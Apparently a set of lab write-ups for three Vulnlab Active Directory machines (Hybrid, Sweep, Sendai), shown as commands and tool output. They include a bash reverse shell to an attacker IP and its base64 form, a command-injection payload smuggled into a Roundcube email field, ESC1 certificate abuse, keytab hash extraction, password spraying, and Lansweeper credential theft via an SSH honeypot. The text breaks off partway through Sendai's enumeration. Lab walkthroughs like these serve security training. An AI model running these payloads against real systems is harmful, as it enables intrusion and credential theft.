vulnlab-hybrid

vulnhub-hybrid

a medium Active-Directory chain

containing : one Ubuntu AD joined pc and a Windows DC

Tools used : keytabextract.py

NMAP enum

# Nmap 7.93 scan initiated Thu Jun 20 10:25:26 2024 as: nmap -Pn -sV -oN ports_hybrid1.txt 10.10.200.5
Nmap scan report for 10.10.200.5
Host is up (0.021s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-20 08:25:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 10:26:16 2024 -- 1 IP address (1 host up) scanned in 49.67 seconds

.

# Nmap 7.93 scan initiated Thu Jun 20 10:27:06 2024 as: nmap -Pn -sV -oN ports_hybrid2.txt 10.10.200.6
Nmap scan report for 10.10.200.6
Host is up (0.020s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
25/tcp   open  smtp     Postfix smtpd
80/tcp   open  http     nginx 1.18.0 (Ubuntu)
110/tcp  open  pop3     Dovecot pop3d
111/tcp  open  rpcbind  2-4 (RPC #100000)
143/tcp  open  imap     Dovecot imapd (Ubuntu)
587/tcp  open  smtp     Postfix smtpd
993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
995/tcp  open  ssl/pop3 Dovecot pop3d
2049/tcp open  nfs_acl  3 (RPC #100227)
Service Info: Host:  mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 10:27:19 2024 -- 1 IP address (1 host up) scanned in 13.26 seconds

.

trough NFS enum we find

admin@hybrid.vl:Duckling21
peter.turner@hybrid.vl:PeterIstToll!

for the mailing part in roundcube i used

bash -i >& /dev/tcp/10.8.2.138/2222 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIuMTM4LzIyMjIgMD4mMQ==

admin&echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIuMTM4LzIyMjIgMD4mMQ==${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl

BloodHound Enum

┌──(puck㉿kali)-[~/vulnlab/hybrid]
bloodhound-python -d 'hybrid.vl' -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -gc 'dc01.hybrid.vl' -ns 10.10.200.5 --zip

Certipy-AD find vuln certs

┌──(puck㉿kali)-[~/vulnlab/hybrid]
certipy-ad find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.200.5      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : hybrid-DC01-CA
    DNS Name                            : dc01.hybrid.vl
    Certificate Subject                 : CN=hybrid-DC01-CA, DC=hybrid, DC=vl
    Certificate Serial Number           : 6FC0F9512195A183421AB786C3012BC6
    Certificate Validity Start          : 2023-06-17 14:04:39+00:00
    Certificate Validity End            : 2123-06-17 14:14:39+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : HYBRID.VL\Administrators
      Access Rights
        ManageCertificates              : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        ManageCa                        : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        Enroll                          : HYBRID.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : HybridComputers
    Display Name                        : HybridComputers
    Certificate Authorities             : hybrid-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Domain Computers
                                          HYBRID.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : HYBRID.VL\Administrator
        Write Owner Principals          : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Dacl Principals           : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Property Principals       : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

we find ESC1 vuln for Domain Computers , I have a Domain joined MAIL01$ machine, enumerating more on MAIL01$, found /etc/krb5.keytab , a file which is used to authenticate to Kerberos without any human interaction or without storing the password.

Transferred the “krb5.keytab” file to my Kali machine and used  keytabextract.py to extract information about MAIL01$ and hashes.

python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : HYBRID.VL
        SERVICE PRINCIPAL : MAIL01$/
        NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
        AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
        AES-128 HASH : 3a732454c95bcef529167b6bea476458

 

Certipy

certipy-ad req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.200.5" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'DC01.hybrid.vl' -key-size 4096 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'


┌──(puck㉿kali)-[~/vulnlab/hybrid]
certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.200.5      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

.

┌──(puck㉿kali)-[~/vulnlab/hybrid]
evil-winrm -i hybrid.vl -u 'Administrator' -H '60<REDACTED>dc' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
hybrid\administrator

 

 

vulnlab-sweep

vulnlab sweep

a medium windows machine

tools used : crackmapexec , bloodhound-python , sshesame , evil-winrm

nmap scan

# Nmap 7.93 scan initiated Mon Jun 17 13:02:37 2024 as: nmap -Pn -sV -oN ports_sweep.txt 10.10.80.128
Nmap scan report for 10.10.80.128
Host is up (0.022s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
81/tcp   open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp   open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-06-17 17:02:48Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
5357/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 17 13:03:09 2024 -- 1 IP address (1 host up) scanned in 32.44 seconds

Enumerate

Brute Force SMB

┌──(puck㉿kali)-[~/vulnlab/sweep]
crackmapexec smb 10.10.80.128 -u 'Guest' -p '' --shares --rid-brute
SMB         10.10.80.128    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.80.128    445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.80.128    445    INVENTORY        [+] Enumerated shares
SMB         10.10.80.128    445    INVENTORY        Share           Permissions     Remark
SMB         10.10.80.128    445    INVENTORY        -----           -----------     ------
SMB         10.10.80.128    445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.80.128    445    INVENTORY        C$                              Default share
SMB         10.10.80.128    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.80.128    445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.80.128    445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.80.128    445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.80.128    445    INVENTORY        SYSVOL                          Logon server share 
SMB         10.10.80.128    445    INVENTORY        [+] Brute forcing RIDs
SMB         10.10.80.128    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

make a users file and crack it with username=password

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt
crackmapexec smb sweep.vl -u users.txt -p users.txt --shares --continue-on-success

Bloodhound Enum

┌──(puck㉿kali)-[~/vulnlab/sweep]
bloodhound-python -d sweep.vl -c All -dc inventory.sweep.vl -ns 10.10.80.128 -u intern -p intern --zip    
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 06S
INFO: Compressing output into 20240617132345_bloodhound.zip

Login to browser as user intern on http://sweep.vl:81/ , go to scanning -> scanning credentials ( see that saved creds are used ), go to scanning -> scanning targets -> add range target vulnab vpn ip , and use saved creds

 

and on Kali machine  run SSH Honeypot, I used sshesame, tthe only thing important to change is the sshesame.yaml file

and set listen_address: 10.8.2.138:22 [ in my case]

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ ./sshesame-linux-amd64 --config sshesame.yaml
INFO 2024/06/17 14:52:02 No host keys configured, using keys at "/home/puck/.local/share/sshesame"
INFO 2024/06/17 14:52:02 Listening on 10.8.2.138:22
WARNING 2024/06/17 14:53:40 Failed to accept connection: Failed to establish SSH server connection: EOF
WARNING 2024/06/17 14:53:46 Failed to accept connection: Failed to establish SSH server connection: ssh: disconnect, reason 11: Session closed
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "0|5<REDACTED>" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected

Logon now to http://sweep.vl:81/Default.aspx as user svc-inventory-lnx

do your thing with more privs

or simpler way after adding svc_inventory_lnx to the “Lansweeper Admins” group.

unintended way : https://github.com/Yeeb1/SharpLansweeperDecrypt

But 1st as Bloodhound suggests:

Full control of a group allows you to directly modify group membership of the group.

Use samba’s net tool to add the user to the target group. The credentials can be supplied in cleartext or prompted interactively if omitted from the command line:

┌──(puck㉿kali)-[~/vulnlab/sweep]
net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx -S inventory.sweep.vl
Password for [SWEEP\svc_inventory_lnx]:

then Win-RM to the box

┌──(puck㉿kali)-[~/vulnlab/sweep]
evil-winrm -i sweep.vl -u 'svc_inventory_lnx' -p '0|5<REDACTED' 

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\temp> upload LansweeperDecrypt.ps1
                                        
Info: Uploading /home/puck/vulnlab/sweep/LansweeperDecrypt.ps1 to C:\temp\LansweeperDecrypt.ps1
                                        
Data: 5700 bytes of 5700 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> ./LansweeperDecrypt.ps1
[+] Loading web.config file...
[+] Found protected connectionStrings section. Decrypting...
[+] Decrypted connectionStrings section:
<connectionStrings>
    <add name="lansweeper" connectionString="Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk<REDACTED>;Connect Timeout=10;Application Name=&quot;LsService Core .Net SqlClient Data Provider&quot;" providerName="System.Data.SqlClient" />
</connectionStrings>
[+] Opening connection to the database...
[+] Retrieving credentials from the database...
[+] Decrypting password for user: SNMP Community String
[+] Decrypting password for user:
[+] Decrypting password for user: SWEEP\svc_inventory_win
[+] Decrypting password for user: svc_inventory_lnx
[+] Credentials retrieved and decrypted successfully:

CredName          Username                Password
--------          --------                --------
SNMP-Private      SNMP Community String   private
Global SNMP                               public
Inventory Windows SWEEP\svc_inventory_win 4^5<REDACTED>
Inventory Linux   svc_inventory_lnx       0|5<REDACTED>

then Winrm to the box as admin

──(puck㉿kali)-[~/vulnlab/sweep]
└─$ evil-winrm -i sweep.vl -u 'SWEEP\svc_inventory_win' -p '4^5<REDACTED>'

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_win\Documents>



 

 

 

 

 

 

 

 

.

 

 

vulnlab-sendai

vulnlab sendai

a medium windows machine

enum

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --users --shares 
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\puck: 
SMB         dc.sendai.vl    445    DC               [+] Enumerated shares
SMB         dc.sendai.vl    445    DC               Share           Permissions     Remark
SMB         dc.sendai.vl    445    DC               -----           -----------     ------
SMB         dc.sendai.vl    445    DC               ADMIN$                          Remote Admin
SMB         dc.sendai.vl    445    DC               C$                              Default share
SMB         dc.sendai.vl    445    DC               config                          
SMB         dc.sendai.vl    445    DC               IPC$            READ            Remote IPC
SMB         dc.sendai.vl    445    DC               NETLOGON                        Logon server share 
SMB         dc.sendai.vl    445    DC               sendai          READ            company share
SMB         dc.sendai.vl    445    DC               SYSVOL                          Logon server share 
SMB         dc.sendai.vl    445    DC               Users           READ            
SMB         dc.sendai.vl    445    DC               [-] Error enumerating domain users using dc ip dc.sendai.vl: NTLM needs domain\username and a password
SMB         dc.sendai.vl    445    DC               [*] Trying with SAMRPC protocol
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

.

rid-brute

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --rid-brute 10000
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\puck: 
SMB         dc.sendai.vl    445    DC               [+] Brute forcing RIDs
SMB         dc.sendai.vl    445    DC               498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               500: SENDAI\Administrator (SidTypeUser)
SMB         dc.sendai.vl    445    DC               501: SENDAI\Guest (SidTypeUser)
SMB         dc.sendai.vl    445    DC               502: SENDAI\krbtgt (SidTypeUser)
SMB         dc.sendai.vl    445    DC               512: SENDAI\Domain Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               513: SENDAI\Domain Users (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               514: SENDAI\Domain Guests (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               515: SENDAI\Domain Computers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               516: SENDAI\Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               517: SENDAI\Cert Publishers (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               518: SENDAI\Schema Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               525: SENDAI\Protected Users (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               526: SENDAI\Key Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1000: SENDAI\DC$ (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1104: SENDAI\sqlsvc (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1105: SENDAI\websvc (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1107: SENDAI\staff (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1112: SENDAI\Susan.Harper (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1117: SENDAI\Jason.Brady (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1128: SENDAI\ca-operators (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1129: SENDAI\admsvc (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1131: SENDAI\support (SidTypeGroup)
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt

Check for password must change

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u users.txt -p '' --continue-on-success
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Administrator: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Guest: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\krbtgt: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Cert: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Schema: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Enterprise: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Group: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Read-only: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Cloneable: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Protected: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Key: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Enterprise: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\RAS: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Allowed: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Denied: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\DC$: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\DnsAdmins: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\DnsUpdateProxy: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\SQLServer2005SQLBrowserUser$DC: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\sqlsvc: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\websvc: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\staff: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Dorothy.Jones: STATUS_LOGON_FAILURE 
